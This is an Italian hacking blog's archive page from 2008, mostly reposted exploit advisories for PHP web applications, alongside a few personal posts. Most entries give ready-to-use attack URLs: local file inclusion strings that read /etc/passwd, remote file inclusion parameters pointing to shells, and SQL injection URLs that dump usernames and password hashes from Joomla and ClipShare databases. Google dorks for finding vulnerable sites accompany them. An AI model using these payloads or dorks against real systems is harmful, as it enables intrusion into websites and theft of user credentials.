h4ckarchive v2.2

La nuova risorsa italiana sull’hacking underground

Archive for the ‘Uncategorized’ Category

Nuovo nome del blog: t3chb0x

nessun commento

Il nuovo nome del nostro blog è t3chb0x… Abbiamo anche cambiato indirizzo: http://t3chb0x.wordpress.com ;)

Written by TheDevil

18 Giugno 2008 alle 12:52 am

Pubblicato in Uncategorized

Liquid-Silver CMS 0.1 (update) LFI Vulnerability

nessun commento

###### exploit : /Script/update/index.php?update=/[name of file wthout php] #####
###### #####
###### example : /Script/update/index.php?update=/home/user/shell #####
###### #####
###### other files: update=../../../../etc/passwd%00 #####
###### #####
###### H-T Team , v4 Team , Tryag , no-hack all my friend #####

Written by TheDevil

26 Gennaio 2008 alle 6:02 pm

Pubblicato in Uncategorized

Lama Software RFI Vulnerability

nessun commento

[+]—————————————————————————-[+]
Lama Software kostenlos Remote file include
Scripts : Lama Software kostenlos
Discovered By : QTRinux
Scripts site : http://www.lama-software.de/
Thanks To : # Tryag.cc # cold z3ro HackTeach.org # AlQaTaRi # Mr.sh4r3s # POISON #
site : www.TRYAG.CC
dork : © 2007 by Lama Software – Accomm Solutions GmbH & Co. KG
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
admin/functions/inc.steps.access_error.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.check_login.php?MY_CONF[classRoot]=Shell
admin/functions/inc.steps.init_system.php?MY_CONF[classRoot]=Shell
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Written by TheDevil

26 Gennaio 2008 alle 6:01 pm

Pubblicato in Uncategorized

PHP Nuke 8.0 Final `sid` sql injection exploit for Search module

nessun commento

# UNPUBLISHED RST/GHC EXPLOIT
# PHP Nuke `sid` sql injection exploit for Search module
# POST method -
# the best for version 8.0 FINAL
# (c)oded by Foster & 1dt.w0lf

Link: http://milw0rm.com/exploits/4965

Written by TheDevil

26 Gennaio 2008 alle 5:59 pm

Pubblicato in Uncategorized

Joomla Component PU Arcade SQL Injection Vulnerability

nessun commento

#########################################################################
Joomla Component PU Arcade Remote SQL Injection Exploit
#########################################################################

## AUTHOR : HouSSamix of H-T TeaM
We are ( HouSSamix _ ToXiC350 _ CoNaN )

## HOME : http://no-hack.net

## Script : PU Arcade Joomla Component ( Tested in version 2.0.3 & 2.1.3 Beta )

## Download : http://www.pragmaticutopia.com/

## DorKs : PU Arcade by www.pragmaticutopia.com
inurl:index.php?option=com_puarcade
inurl:/option,com_puarcade/

## EXPLOIT :

http://server.com/Path/index.php?option=com_puarcade&Itemid=

92&fid=-1%20union%20select%20concat(username,0×3a,password)%20from%20jos_users–

## GREETZ : GoLd_M , RoMaNcYxHaCkEr , Jiko , cx0x and all musulmans hackers

#########################################################################
Joomla Component PU Arcade Remote SQL Injection Exploit
#########################################################################

Written by TheDevil

4 Gennaio 2008 alle 4:23 am

Pubblicato in Uncategorized

ClipShare SQL Injection Vulnerability

nessun commento

#########################################################################
video sharing www.clip-share.com Remote SQL Injection Exploit All Version
#########################################################################
AUTHOR :Krit webmaster of http://www.thaishadow.com
HOME : http://www.thaishadow.com
Download : http://www.clip-share.com/
###########################################################################
DorKs :inurl:/uprofile.php?UID=
or
“Powered by clipshare”
###########################################################################
## EXPLOIT :
http://server.com/Path/uprofile.php?UID=1+and+1=2+union+select+1,2

,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2

4,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*
###########################################################################
## GREETZ : Exploiters,Pongz,{OHM},Usermode,windows98SE,azazel,Tesz,Mr`Ping
###########################################################################

Written by TheDevil

4 Gennaio 2008 alle 4:22 am

Pubblicato in Uncategorized

SanyBee Gallery 0.1.1 LFI Vulnerability

nessun commento

################################################################################
# SanyBee Gallery 0.1.1 (p) local File Inclusion
#
# Script Name: SanyBee Gallery 0.1.1
#
# D.Script: http://www.easy-script.com/scripts-dl/SanyBeeGallery_V0.1.0.zip
#
# Discovered by: jackal
#
# contact: mi3adi@hotmail.fr
################################################################################

*==Exploit==*
================================================================

http://www.target.com/[SanyBee Gallery 0.1.1]/index.php?p=[ LFI ]%00
================================================================

Thanx: [cold-zer0]==&==[kof]==&==[firas]

GreeTz: [M]oRoCCaN [S]aBoTaGe [T]eaM

Written by TheDevil

4 Gennaio 2008 alle 4:21 am

Pubblicato in Uncategorized

MatPo Bilder Galerie 1.1 RFI Vulnerability

nessun commento

Vulnerabilità RFI del 30-12-2007:

[~] Script…….: MatPo Bilder Galerie 1.1
[~] Download…..: http://www.mapos-scripts.de/download,33.html
[~] Author…….: Crackers_Child | cybermilitan@hotmail.com & localexploit@hotmail.com
[~] Class……..: Remote File İnclude Vulnerability
[~] Dork………: intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie
[~] Exploit Rfi…: http://[Taget]/[Path]/includes/tumbnail.php?config[root_ordner]=sh3lz?
[~] Special Thanx…….: str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)

Written by TheDevil

1 Gennaio 2008 alle 5:05 am

Pubblicato in Uncategorized

Buon 2008, l’anno di Linux è qui!

nessun commento

h4ckarchive vi augura un buon 2008 a tutti…
…e vi ricorda soppratutto che il 2008 sarà l’anno del pinguino :) I motivi?
La pubblicità generata dalla decisione di Dell di vendere PC con Ubuntu,  l’alto livello di usabilità delle distribuzioni principali ( nell’articolo vengono citate la creatura di Shuttleworth, Fedora ed openSUSE ), la lentezza con cui Windows Vista sta comparendo sul mercato potrebbero agevolare lo switch di molti utenti stanchi delle politiche di Microsoft….abbiamo detto tutto! Vedremo che succederà.

Written by TheDevil

1 Gennaio 2008 alle 4:56 am

Pubblicato in Uncategorized

Benvenuti!

nessun commento

h4ckarchive security blog ritorna dopo circa 5 mesi dalla sua ultima comparsa sul web, e su questo hosting. Dalla prima volta che comparì sul web, durante il mese di marzo 2007, raggiunse un grande successo fino al mese di giugno, di oltre 20.000 visite in pochi mesi! h4ckarchive lasciò WordPress, per diventare un portale indipendente, e infine chiuso a sua volta, per diventare un forum, che continuò a sopravvivere per circa 1 mese, dopodichè scomparì ben presto, per il poco successo ottenuto. Adesso siamo di nuovo qua, a voler far ricrescere il primo e vero h4ckarchive nato, in una nuova veste grafica e una conoscienza più sviluppata nel campo dell’hacking e sicurezza informatica, per chi vuole conoscere e imparare!

Written by TheDevil

1 Gennaio 2008 alle 4:34 am

Pubblicato in Uncategorized